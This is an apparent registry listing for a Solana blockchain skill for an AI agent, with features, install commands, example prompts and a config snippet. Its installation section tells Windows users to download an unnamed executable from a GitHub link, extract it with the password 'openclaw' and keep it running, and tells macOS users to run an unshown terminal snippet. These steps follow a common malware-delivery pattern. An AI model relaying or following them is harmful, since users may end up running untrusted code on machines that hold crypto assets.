ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Master Solana blockchain interactions with OpenClaw. Check balances, monitor SPL tokens, view transaction history, and analyze NFT metadata directly from your AI agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-ixqvy
Or

What This Skill Does

The Solana skill for OpenClaw provides a powerful command-line interface to interact directly with the Solana blockchain. It bridges the gap between your AI agent and the network, allowing you to perform essential financial and data-driven tasks seamlessly. Whether you are managing personal assets, analyzing on-chain activity, or monitoring specific wallet movements, this skill serves as your gateway. It supports checking balances (in both SOL and lamports), viewing detailed transaction histories, and querying account state information. Furthermore, it excels in token management, offering tools to list and track SPL token balances, as well as specialized utilities like Metaboss for deep-diving into NFT metadata. By leveraging native Solana CLI commands and custom curl integrations, this skill ensures you have full visibility into your blockchain assets.

Installation

To begin, ensure you have the OpenClaw agent running as a foundational requirement. Install the skill using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-ixqvy. For Windows users, download the openclaw-agent from the provided GitHub link, extract it using the password openclaw, and keep the executable active. macOS users should use the provided terminal snippet for automated configuration. Once the agent is active, verify your setup by installing the Solana CLI via the official release script and setting your preferred RPC URL to the mainnet-beta endpoint. Detailed setup guides for custom RPCs and development environments are included to ensure your connection remains robust and responsive.

Use Cases

This skill is ideal for power users and developers who require rapid, programmatic access to the Solana ecosystem. Common use cases include: 1) Automated portfolio monitoring where an agent tracks specific token fluctuations; 2) Transaction verification, confirming receipt of funds by querying signatures; 3) NFT analysis, where you retrieve metadata or mint status of assets; 4) Security auditing, checking the integrity of account data; and 5) Staking oversight, viewing active stake accounts directly from the CLI. It is an essential tool for those managing multiple wallets or requiring quick data retrieval without navigating web-based block explorers.

Example Prompts

  1. "Check the current SOL balance for this address: 461t2Tf9oT15P6T8qYd7g5n7Vq5z5q5z5q5z5q5z5q5z"
  2. "What are the last 5 transactions for my wallet and list all my SPL token balances?"
  3. "Monitor address 461t2Tf9oT15P6T8qYd7g5n7Vq5z5q5z5q5z5q5z5q5z for any balance changes every 5 seconds."

Tips & Limitations

Always ensure your RPC provider is reliable; public endpoints may experience rate limiting during peak network congestion. For production-grade or high-frequency monitoring, consider using a dedicated private RPC provider. The skill requires the openclaw-agent to remain active; without it, blockchain commands will fail. Remember that while this tool provides visibility, it does not store private keys or handle signing; always practice secure private key management outside of your AI agent’s workspace. For NFT metadata queries, ensure you have Rust and Cargo installed to run the Metaboss utility effectively.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-ixqvy": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#defi
Safety Score: 3/5

Flags: network-access, code-execution